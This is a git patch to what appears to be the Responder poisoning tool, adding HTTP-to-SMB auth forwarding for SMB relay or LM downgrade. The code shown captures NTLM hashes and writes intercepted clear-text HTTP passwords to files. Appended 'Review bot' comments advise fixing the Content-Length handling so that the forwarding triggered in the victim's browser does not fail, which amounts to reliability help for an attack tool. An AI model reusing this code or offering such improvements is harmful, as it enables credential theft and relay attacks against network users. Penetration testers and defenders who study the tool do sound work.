From 0fcaa68c074e496edb2164ca35659ff636b5a361 Mon Sep 17 00:00:00 2001
From: Lgandx
Date: Wed, 12 Jun 2013 12:12:14 -0400
Subject: [PATCH] added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM.

---
 HTTPPackets.py | 8 ++++++--
 Responder.py | 11 +++++++----
 2 files changed, 13 insertions(+), 6 deletions(-)

diff --git a/HTTPPackets.py b/HTTPPackets.py
index 1b560a7..2b778f4 100644
--- a/HTTPPackets.py
+++ b/HTTPPackets.py
@@ -56,9 +56,13 @@ class IIS_Auth_Granted(Packet):
         ("Type", "Content-Type: text/html\r\n"),
         ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
         ("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
-        ("Len", "Content-Length: 0\r\n"),
-        ("CRLF", "\r\n"),
+        ("ContentLen", "Content-Length: "),
+        ("ActualLen", "76"),
+        ("CRLF", "\r\n\r\n"),
+        ("Payload", "\n\n\n\nLoading\n\n\n"),
     ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 
 #HTTP NTLM Auth
 class NTLM_Challenge(Packet):
diff --git a/Responder.py b/Responder.py
index 4f99eaa..ba3680f 100644
--- a/Responder.py
+++ b/Responder.py
@@ -907,16 +907,18 @@ def PacketSequence(data,client):
             if packetNtlm == "\x03":
                 NTLM_Auth= b64decode(''.join(a))
                 ParseHTTPHash(NTLM_Auth,client)
-                buffer1 = str(IIS_Auth_Granted())
-                return buffer1
+                buffer1 = IIS_Auth_Granted()
+                buffer1.calculate()
+                return str(buffer1)
             if b:
                 GrabCookie(data,client)
                 outfile = "HTTP-Clear-Text-Password-"+client+".txt"
                 WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
                 print "[+]HTTP-User & Password:", b64decode(''.join(b))
                 logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b))))
-                buffer1 = str(IIS_Auth_Granted())
-                return buffer1
+                buffer1 = IIS_Auth_Granted()
+                buffer1.calculate()
+                return str(buffer1)
             else:
                 return str(Basic_Ntlm(Basic))
@@ -1432,3 +1434,4 @@ if __name__ == '__main__':
                 raw_input()
 
+
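Review bot: The `ActualLen` default of `"76"` in the field table is only correct if every caller remembers to invoke `calculate()` before `str()`; a caller that forgets sends a `Content-Length` that disagrees with the body, and the victim browser then either waits on the socket or truncates the page, so the forwarding this commit is meant to trigger silently fails. Consider computing the length where it cannot be skipped, for example `self.fields["ActualLen"] = str(len(self.fields["Payload"]))` in an `__init__` override (the base `Packet` is outside this hunk, so whether it already offers such a hook is not visible), and keep the value a `str` like every other field so the header renders the same way however `Packet` joins its fields. At minimum a comment on the new method, `# Content-Length must equal the byte length of Payload; callers must run this before str()`, would document the contract. The payload shown here carries only the text `Loading`; whatever element performs the SMB forwarding named in the subject is not visible in this hunk, so that behaviour cannot be reviewed from this copy.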
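Review bot: The three-line `IIS_Auth_Granted()` / `calculate()` / `return str(...)` sequence is now duplicated in the NTLM type-3 branch and in the Basic-auth branch, and both copies have to be kept in sync whenever the length calculation or the response changes; a small helper such as `def HTTPAuthGranted(): p = IIS_Auth_Granted(); p.calculate(); return str(p)` called from both places would remove the duplication. `PacketSequence` begins before this hunk and its remaining branches are not visible, so other call sites of `IIS_Auth_Granted()` that still omit `calculate()` cannot be ruled out from here. A short comment at the first call, `# 200 reply now carries a body (was Content-Length: 0); calculate() fixes up the length`, would tell the next reader why the extra call is required.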